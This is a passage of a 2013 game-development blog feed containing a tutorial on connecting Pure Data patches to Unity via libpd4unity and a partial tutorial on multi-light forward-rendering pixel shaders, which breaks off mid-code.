<p>Whew, that was a long post. If anything is unclear, or you spot a mistake (I wrote most of this on a train, it’s very possible something is a bit off) feel free to send me a message <a href="http://twitter.com/khalladay">on Twitter.</a></p>
<p>Merry Christmas! :D</p>
Combining Pure Data and Unity2013-11-10T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2013/11/10/Libpd-and-Unity<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>About 6 months ago, for 1GAM, Johannes and I spent a month tinkering with LibPD (the end result was Synapse). LibPD, for those of you who don’t know, is a library for working with <a href="http://puredata.info/">Pure-Data</a>, a visual programming tool for procedural audio. Out of the box, it doesn’t work nicely with Unity, but there’s a repository called libpd4unity that simplifies the process.</p>
<div align="center">
<img src="/images/post_images/2013-11-10/pd.png" /><br />
<font size="2">
The sample pd program used in this tutorial
</font>
</div>
<p><br /></p>
<p>Libpd4unity isn’t suited to really in depth PD development in Unity (at the moment it seems to only support loading one patch at a time), but you can still do some interesting things with it. So today, I’m going to go over the process of setting up libpd4unity with Unity.</p>
<p>If you’re on mac, you may be a bit disappointed to see that there isn’t a mac compatible pd library in the libpd4unity class, so the first step for us is to compile a .bundle for mac. If you’re on windows, skip down to the actual programming.</p>
<h2>Building libpdcsharp.bundle</h2>
<p>Thankfully this is pretty straightfoward, if a bit weird:</p>
<ul>
<li>Download the <a href="https://github.com/libpd/libpd">LibPD Project</a> from github</li>
<li>In terminal, cd into the downloaded project folder and type the command <a href="https://github.com/libpd/libpd/wiki/Building-the-C%23-Api">make csharplib</a></li>
<li>libcsharp.dylib should now be created inside the libs folder. Copy that to the Assets/Plugins folder in Unity</li>
<li>Rename this file to libcsharp.bundle. Unity has a problem locating dylibs.</li>
<li>You’re good to go!</li>
</ul>
<h2>LibPD and Unity</h2>
<p>Note: You will need to download <a href="https://github.com/patricksebastien/libpd4unity">Libpd4Unity</a></p>
<p>Ok now that that’s out of the way, it’s time for some fun stuff. First off, copy the LibPD folder from libpd4unity/Assets, and paste it into the assets folder of your project.</p>
<p>Next, make an Assets/Resources folder. This is a special folder that allows you to specify resources that you want to have available to Unity at runtime. Put your patches in this folder (or a subfolder of it). If you don’t have a patch to work with, or want to follow along exactly with this demo, you can grab the <a href="https://github.com/khalladay/Unity-PD-Sample/blob/master/Assets/Resources/example.pd">simple sine patch</a> from the repo for this post’s example project (patch courtesy of <a href="johannesg.com">johannesg.com</a> ).</p>
<p>Now that all the housekeeping is taken care of, it’s time to actually interact with a patch program from Unity. LibPd4Unity comes with an example script called LibPdFilterRead.cs that will serve as the basic outline for our class, but we’re going to tailor ours to suit our needs a bit better.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">using</span> <span class="nn">UnityEngine</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Collections</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">LibPDBinding</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.InteropServices</span><span class="p">;</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">OSCControl</span> <span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="kt">string</span> <span class="n">patch</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">bool</span> <span class="n">playOnAwake</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">bool</span> <span class="n">patchIsStereo</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">patchName</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">bool</span> <span class="n">islibpdready</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">string</span> <span class="n">path</span><span class="p">;</span>
<span class="k">private</span> <span class="n">GCHandle</span> <span class="n">dataHandle</span><span class="p">;</span>
<span class="k">private</span> <span class="n">IntPtr</span> <span class="n">dataPtr</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">float</span> <span class="n">freq</span> <span class="p">=</span> <span class="m">500</span><span class="p">;</span></code></pre></figure>
<p>The script I’m going to build here interacts with the sample patch linked above.</p>
<p>Lets go through these variables:</p>
<ul>
<li>patch: the name of the patch file to use</li>
<li>playOnAwake: what it says on the tin</li>
<li>patchIsStereo: only check this if you are SURE your patch is stereo, otherwise you’ll hear garbled crap</li>
<li>patchName: the integer patch name generated by LibPD</li>
<li>islibpdready: does what it says on the tin</li>
<li>path: this will be the patch variable with the rest of the filepath prepended to it</li>
<li>dataHandle: this will eventually be used to let us have access to the audio stream from pd without worrying about the garbage collector</li>
<li>dataPtr: this will hold the address of the patch we’re interacting with</li>
<li>freq: the frequency we want to pass to our program</li>
</ul>
<p>Now let’s get to some functionality</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Awake</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">path</span> <span class="p">=</span> <span class="n">Application</span><span class="p">.</span><span class="n">dataPath</span> <span class="p">+</span> <span class="s">"/Resources/"</span> <span class="p">+</span> <span class="n">patch</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">playOnAwake</span><span class="p">)</span><span class="nf">loadPatch</span> <span class="p">();</span>
<span class="p">}</span>
<span class="k">public</span> <span class="k">void</span> <span class="nf">loadPatch</span> <span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span><span class="p">(!</span><span class="n">islibpdready</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(!</span><span class="n">patchIsStereo</span><span class="p">)</span> <span class="n">LibPD</span><span class="p">.</span><span class="nf">OpenAudio</span> <span class="p">(</span><span class="m">1</span><span class="p">,</span><span class="m">1</span><span class="p">,</span> <span class="m">48000</span><span class="p">);</span>
<span class="k">else</span> <span class="n">LibPD</span><span class="p">.</span><span class="nf">OpenAudio</span><span class="p">(</span><span class="m">2</span><span class="p">,</span><span class="m">2</span><span class="p">,</span><span class="m">48000</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">patchName</span> <span class="p">=</span> <span class="n">LibPD</span><span class="p">.</span><span class="nf">OpenPatch</span> <span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">ComputeAudio</span> <span class="p">(</span><span class="k">true</span><span class="p">);</span>
<span class="n">islibpdready</span> <span class="p">=</span> <span class="k">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Awake isn’t all that interesting, except to show off how to get the actual file path to the patch. Also note that loadPath() needs to be called before we can start working with pd.</p>
<p>loadPatch is the standard initialization sequence for working with libPd.</p>
<p>I’m going to hold off on the good stuff until the end, so we’re going to skip from the initialization process down to the cleanup process. This is a little more involved than the usual in C# because we are explicitly telling the garbage collector to not interact with the data stream, so we need to do a bit of manual memory management. This is taken directly from the example project in LibPd4Unity.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">public</span> <span class="k">void</span> <span class="nf">closePatch</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">ClosePatch</span> <span class="p">(</span><span class="n">patchName</span><span class="p">);</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">Release</span> <span class="p">();</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">OnApplicationQuit</span> <span class="p">()</span>
<span class="p">{</span>
<span class="nf">closePatch</span> <span class="p">();</span>
<span class="p">}</span>
<span class="k">public</span> <span class="k">void</span> <span class="nf">OnDestroy</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">dataHandle</span><span class="p">.</span><span class="nf">Free</span><span class="p">();</span>
<span class="n">dataPtr</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I don’t have a good explanation for why we don’t need to free the dataHandle on close patch, so if anyone has an idea, shoot me a message on twitter and I can update the post. Otherwise, this is boilerplate code that will need to be added to every class that you write that will handle loading a Pd program.</p>
<p>And now finally, the good stuff!</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">public</span> <span class="k">void</span> <span class="nf">OnAudioFilterRead</span> <span class="p">(</span><span class="kt">float</span><span class="p">[]</span> <span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">channels</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="n">dataPtr</span> <span class="p">==</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">dataHandle</span> <span class="p">=</span> <span class="n">GCHandle</span><span class="p">.</span><span class="nf">Alloc</span><span class="p">(</span><span class="n">data</span><span class="p">,</span><span class="n">GCHandleType</span><span class="p">.</span><span class="n">Pinned</span><span class="p">);</span>
<span class="n">dataPtr</span> <span class="p">=</span> <span class="n">dataHandle</span><span class="p">.</span><span class="nf">AddrOfPinnedObject</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">LibPD</span><span class="p">.</span><span class="nf">Process</span><span class="p">(</span><span class="m">32</span><span class="p">,</span> <span class="n">dataPtr</span><span class="p">,</span> <span class="n">dataPtr</span><span class="p">)==</span><span class="m">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">SendFloat</span><span class="p">(</span><span class="n">patchName</span> <span class="p">+</span> <span class="s">"freq1"</span><span class="p">,</span> <span class="n">freq</span><span class="p">);</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">SendFloat</span><span class="p">(</span><span class="n">patchName</span> <span class="p">+</span> <span class="s">"freq2"</span><span class="p">,</span> <span class="n">freq</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">OnGUI</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">r</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Rect</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">/</span><span class="m">2</span> <span class="p">-</span> <span class="m">50</span> <span class="p">,</span>
<span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">/</span><span class="m">2</span> <span class="p">-</span> <span class="m">150</span><span class="p">,</span>
<span class="m">100</span><span class="p">,</span>
<span class="m">300</span><span class="p">);</span>
<span class="n">freq</span> <span class="p">=</span> <span class="n">GUI</span><span class="p">.</span><span class="nf">VerticalSlider</span><span class="p">(</span><span class="n">r</span><span class="p">,</span><span class="n">freq</span><span class="p">,</span><span class="m">1000</span><span class="p">,</span> <span class="m">400</span><span class="p">);</span>
<span class="n">Rect</span> <span class="n">r2</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Rect</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">/</span><span class="m">2</span><span class="p">-</span><span class="m">30</span><span class="p">,</span>
<span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">/</span><span class="m">2</span> <span class="p">-</span> <span class="m">30</span><span class="p">,</span>
<span class="m">80</span><span class="p">,</span>
<span class="m">30</span><span class="p">);</span>
<span class="n">GUI</span><span class="p">.</span><span class="nf">Box</span><span class="p">(</span><span class="n">r2</span><span class="p">,</span> <span class="s">""</span><span class="p">+</span><span class="n">freq</span><span class="p">+</span><span class="s">" hz"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>OnAudioFilterRead is the callback method used by LibPd4Unity’s library. It will be called whenever the internal audio buffer has been filled. I’m really not sure why we’re checking that libPD.Process returns 0, although I assume that’s LibPD’s “all good” return value.
Inside that block you can see how to pass messages to the currently running patch. What tripped me up for awhile was both the need to prepend the target value’s name with the int name of the loaded patch, and the need to leave off the “$0” part of the variable name, which is displayed when you open the patch in pd.</p>
<h2>Building a Project on Mac</h2>
<p>Everything should now work fine in the editor, but if you’re on mac, your journey is not over yet!</p>
<p>If you have tried to actually create a build, you will have noticed the big, ugly error message that pops up:</p>
<p><strong>Error building Player: IOException: Cannot create Temp/StagingArea/UnityPlayer.app/Contents/Plugins/libpdcsharp.bundle/libpdcsharp.bundle because a file with the same name already exists.</strong></p>
<p>Apparently Unity really really hates people who use libpd. Thankfully, there is a solution!</p>
<ul>
<li>Remove libpdcsharp.bundle from your plugins folder (but don’t delete it, we’ll need it in a second)</li>
<li>Build your project as you normally would</li>
<li>Locate the .app file that you just built, right click on it, and select “Show Package Contents,” and open the “Contents” folder within</li>
<li>If there is no folder named “Plugins” inside Contents, create one now.</li>
<li>Paste libpdcsharp.bundle into the Plugins folder</li>
<li>Go back to your Unity project, and copy the .pd file from your resources folder</li>
<li>Paste this file into the Resources folder located inside your .app’s Contents folder.</li>
</ul>
<p>All of this is necessary because Unity’s build process doesn’t like the libpdcsharp bundle, and attempts to copy it multiple times (creating that ugly error), and completely ignores the patch file in Resources because it doesn’t recognize the file extension. Thankfully, all that’s needed to resolve this a mildly annoying process.</p>
<p>If you’ve made it this far, you should now have a unity project that can interact with Pure Data plugins, and can actually create builds! Congratulations! If you’ve hit any difficulties or need further clarification on something I’ve said here, you can download a sample project <a href="https://dl.dropboxusercontent.com/u/6128167/Unity-PD-Sample.zip">from my dropbox</a>, or send me a message <a href="http://twitter.com/khalladay">on Twitter.</a> Hope this tutorial helped!</p>
Writing Multi-Light Pixel Shaders in Unity2013-10-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2013/10/13/Multi-Light-Diffuse<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>One of the first things that people get shown when they start learning shaders is how to write a simple, single light, diffuse shader. I have yet to see a single shader tutorial out there that ever returns to this initial exercise to demonstrate how to write shaders which can properly interact with multiple (and different kinds of) lights. So I’m going to try to fill in that gap with what I’ve managed to figure out on my own.</p>
<p>This will hopefully serve as a good starting point for any truly custom lighting shaders you want to write. To be clear, the end goal of this tutorial is simply to have a pixel shader that looks as close as possible to the built in Diffuse shader. The end result of this shader looks like this:</p>
<div align="center">
<img src="/images/post_images/2013-10-13/shader_output.png" /><br />
<font size="2">
Our shader is on the left, compared to the built in diffuse on the right
</font>
</div>
<p><br /></p>
<p>Ok, let’s get started with a basic skeleton of what we’re building. Mulit-light shaders (in Forward Rendering) use a separate pass for each pixel light in the scene. How this looks in practice is 2 defined passes in the shader. One (the Base Pass) renders the first light in the scene, and the second pass (the Add pass) gets called once for each additional light, and is additively blended with the previous passes. It looks something like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="n">Shader</span> <span class="s">"BetterDiffuse"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_Color</span> <span class="p">(</span><span class="s">"Main Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB) Alpha (A)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"Queue"</span> <span class="o">=</span> <span class="s">"Geometry"</span> <span class="s">"RenderType"</span> <span class="o">=</span> <span class="s">"Opaque"</span><span class="p">}</span>
<span class="n">Pass</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"ForwardBase"</span><span class="p">}</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="n">Pass</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"ForwardAdd"</span><span class="p">}</span>
<span class="n">Blend</span> <span class="n">One</span> <span class="n">One</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">Fallback</span> <span class="s">"VertexLit"</span>
<span class="p">}</span></code></pre></figure>
<p>Nothing compiles yet, but at least we have the basic structure we’re going to use in place. You can see above that the base and add passes are marked using the LightMode tag. This is a tag which tells unity which pass to use for which. The “Forward” prefix on Add and Base identifies that these passes are for Forward rendering. This tutorial won’t cover Deferred Rendering (mostly because I haven’t wrapped my head around it yet).</p>
<p>If you’re wondering, the fallback to VertexLit allows us to use the VertexLit shaders shadow passes. Our shader will not cast shadows properly without this.</p>
<p>Next, let’s look at what our vertex input and output structs need to be:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="k">struct</span> <span class="nc">vertex_input</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">NORMAL</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">texcoord</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="k">struct</span> <span class="nc">vertex_output</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">lightDir</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">TEXCOORD2</span><span class="p">;</span>
<span class="n">LIGHTING_COORDS</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="p">};</span></code></pre></figure>
<p>Output wise, we need the obvious position, uv coords and vertex normal, we also need to get the vector from our vertex to the current light in object space. Finally, we need to grab light attenuation information, and shadow info. Unity has a macro for grabbing those last two items, LIGHTING_COORDS(x,y). This macro will put lighting info into TEXCOORDX and shadow info into TEXCOORDY. This takes care of the messy business of dealing with all the different datatypes needed for different types of lights.</p>
<p>Just remember to include UnityCG.cginc, Lighting.cginc and AutoLight.cginc if you’re using the Unity macros.</p>
<p>Ok, things are looking pretty good here. Let’s move on the vertex program. For the most part, the vertex program for each pass is fairly normal (for now, we’ll come back to this later when we talk about vertex lights).</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vertex_output</span> <span class="nf">vert</span> <span class="p">(</span><span class="n">vertex_input</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vertex_output</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span> <span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">.</span><span class="n">xy</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">normal</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">ObjSpaceLightDir</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">TRANSFER_VERTEX_TO_FRAGMENT</span><span class="p">(</span><span class="n">o</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The 2 lines before the return bear a bit more explanation. ObjSpaceLightDir(float4 x) is a method provided in AutoLight.cginc. Simply put, it returns a vector going from the light to the current vertex in object space. You can check out ObjSpaceLightDir in UnityCG.cginc if you’re interested in the details, but for our purposes, using the built in function will be fine.</p>
<p>TRANSFER_VERTEX_TO_FRAGMENT is the macro provided to transfer the data declared with LIGHTING_COORDS to the fragment program. It does some co-ordinate space conversions as well, but since we’re just going to grab the end values from all these calculations for our light attenuation, we don’t need to worry about them right now. For now our goal is just a pixel shader that looks like the Diffuse surface shader.</p>
<p>Alright, on to the fragment program for our passes. For one, we’re going to need to grab the colour from the texture we have applied to our mesh, and do a colour multiply on it to take into account the inspector inputs we defined at the top of the page. Then we’re going to be getting the lighting attenuation value from Unity. Finally, we’re going to use the lightDir variable we set in the vertex shader to calculate the diffuse lighting value with.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_MainTex_ST</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">_Color</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">_LightColor0</span><span class="p">;</span>
<span class="n">half4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vertex_output</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="o">*</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">zw</span><span class="p">);</span>
<span class="n">tex</span> <span class="o">*=</span> <span class="n">_Color</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">atten</span> <span class="o">=</span> <span class="n">LIGHT_ATTENUATION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="n">i</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">normal</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">UNITY_LIGHTMODEL_AMBIENT</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">tex</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="p">(</span><span class="n">tex</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">diff</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">tex</span><span class="p">.</span><span class="n">a</span> <span class="o">+</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">a</span> <span class="o">*</span> <span class="n">atten</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>Not much here should be too out of the ordinary (save for the call to LIGHT_ATTENUATION). One thing that I’ve yet to be able to account for are the multiplications by 2 in the diffuse calculations. It’s very clear that this gives us an end result that looks like the built-in diffuse shader, but I’m not entirely sure why the built in diffuse shader would be multiplying these values by 2 either. Nevertheless, to hit our goal, we’re going to do it too. Just remember to leave out the ambient calculations in the ForwardAdd pass, otherwise things will be way too bright.</p>
<p>Great! If you try out the shader now, it should look pretty darn good. Don’t get too comfy though, there’s still one more task to do. If you add more than 3 lights to your scene you will notice the shader starts behaving strangely right now. This is because we haven’t specified what we want to do with Vertex lights. Unity only supports up to 4 Per-Pixel lights, but it will allow 4 more lights to be used on a per vertex basis. Unfortunately our current code doesn’t take into account these lights, so we need to add support for them now.</p>
<p>Step one is to add a float3 to our output struct to hold the summed colour of the lights for the current vertex. Next we need to convert our object space position and normal into world space, and pass them to a for loop that calculates the diffuse lighting for each of the 4 possible vertex lights. Once we get that colour into our frag shader, we just add it to the colour we’re already multiplying the texture by. The end result isn’t exactly identical to the built in shaders, but it’s a reasonable approximation.</p>
<p>Our new ForwardBase vertex_output struct looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">vertex_output</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">lightDir</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">TEXCOORD2</span><span class="p">;</span>
<span class="n">LIGHTING_COORDS</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="n">float3</span> <span class="n">vertexLighting</span> <span class="o">:</span> <span class="n">TEXCOORD5</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>That pass’ vertex function is now:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"> <span class="n">vertex_output</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vertex_input</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vertex_output</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span> <span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">.</span><span class="n">xy</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">ObjSpaceLightDir</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">normal</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">;</span>
<span class="n">TRANSFER_VERTEX_TO_FRAGMENT</span><span class="p">(</span><span class="n">o</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertexLighting</span> <span class="o">=</span> <span class="n">float3</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">);</span>
<span class="cp">#ifdef VERTEXLIGHT_ON
</span>
<span class="n">float3</span> <span class="n">worldN</span> <span class="o">=</span> <span class="n">mul</span><span class="p">((</span><span class="n">float3x3</span><span class="p">)</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">SCALED_NORMAL</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">worldPos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">index</span> <span class="o"><</span> <span class="mi">4</span><span class="p">;</span> <span class="n">index</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">lightPosition</span> <span class="o">=</span> <span class="n">float4</span><span class="p">(</span><span class="n">unity_4LightPosX0</span><span class="p">[</span><span class="n">index</span><span class="p">],</span>
<span class="n">unity_4LightPosY0</span><span class="p">[</span><span class="n">index</span><span class="p">],</span>
<span class="n">unity_4LightPosZ0</span><span class="p">[</span><span class="n">index</span><span class="p">],</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">vertexToLightSource</span> <span class="o">=</span> <span class="n">float3</span><span class="p">(</span><span class="n">lightPosition</span> <span class="o">-</span> <span class="n">worldPos</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">lightDirection</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">vertexToLightSource</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">squaredDistance</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">vertexToLightSource</span><span class="p">,</span> <span class="n">vertexToLightSource</span><span class="p">);</span>
